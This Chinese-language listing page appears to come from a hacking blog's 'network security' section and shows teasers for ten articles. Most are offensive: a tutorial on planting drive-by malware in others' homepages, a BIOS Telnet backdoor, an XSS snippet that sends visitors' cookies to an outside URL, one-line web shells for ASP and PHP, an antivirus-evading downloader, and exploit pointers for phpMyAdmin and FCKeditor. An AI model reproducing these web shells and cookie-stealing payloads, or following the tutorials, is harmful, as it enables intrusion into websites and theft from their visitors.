网络安全 汇编揭开死循环的神秘面纱 i 首先请大家看这么一个简单的小程序: #include <stdio.h>void main(){ int i... 07月21日 928 次浏览 发表评论 阅读全文
网页挂马详细步骤教程 其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。 下面我介绍5种方法,我一个一个介绍 方法一:这个就是最简... 07月21日 网络安全 900 次浏览 发表评论 阅读全文
冰河暗涌防不胜防 BIOS下实现的Telnet后门 该项目仅为实验性项目,主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。 项目涉及的相关知识及技... 07月21日 网络安全 1,594 次浏览 发表评论 阅读全文
asp php XSS获取cookie的代码 <script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" wi... 07月21日 网络安全 900 次浏览 发表评论 阅读全文
一句话木马(asp,php) 总结篇 asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST);?> aspx一句话 <scri... 07月21日 网络安全 1,085 次浏览 发表评论 阅读全文
判断数据库web是否分离的技巧 得到客户端主机名: select host_name(); 得到服务端主机名: select @@servername; 结果一样就极有可能未分离,结果不一样就是分离的 点评: 在实际的渗透过程中,我... 07月21日 网络安全 1,096 次浏览 发表评论 阅读全文
利用windows自带功能做永不被查杀的下载者(超小体积)! 用windows自带功能做永不被查杀,超小体积的下载者! 利用windows自带功能做永不被查杀,超小体积的下载者! 今天自己搞出来个永不会被杀的下载者 好东西就要拿出来和大家分享,,, 把制作过程告... 07月21日 网络安全 740 次浏览 发表评论 阅读全文
mysql 读取文件的几种方式及应用 章出处:C.R.S.T 作者:sai52 blog:www.sai52.com 今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 ... 07月21日 网络安全 1,000 次浏览 发表评论 阅读全文
phpMyAdmin table参数SQL注入漏洞 影响版本: phpMyAdmin phpmyadmin 3.x phpMyAdmin phpMyAdmin 2.11.x 漏洞描述: BUGTRAQ ID: 32720 phpMyAdmin是用PHP... 07月21日 网络安全 728 次浏览 发表评论 阅读全文
FCKeditor JSP版漏洞 FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/conn... 07月21日 网络安全 834 次浏览 发表评论 阅读全文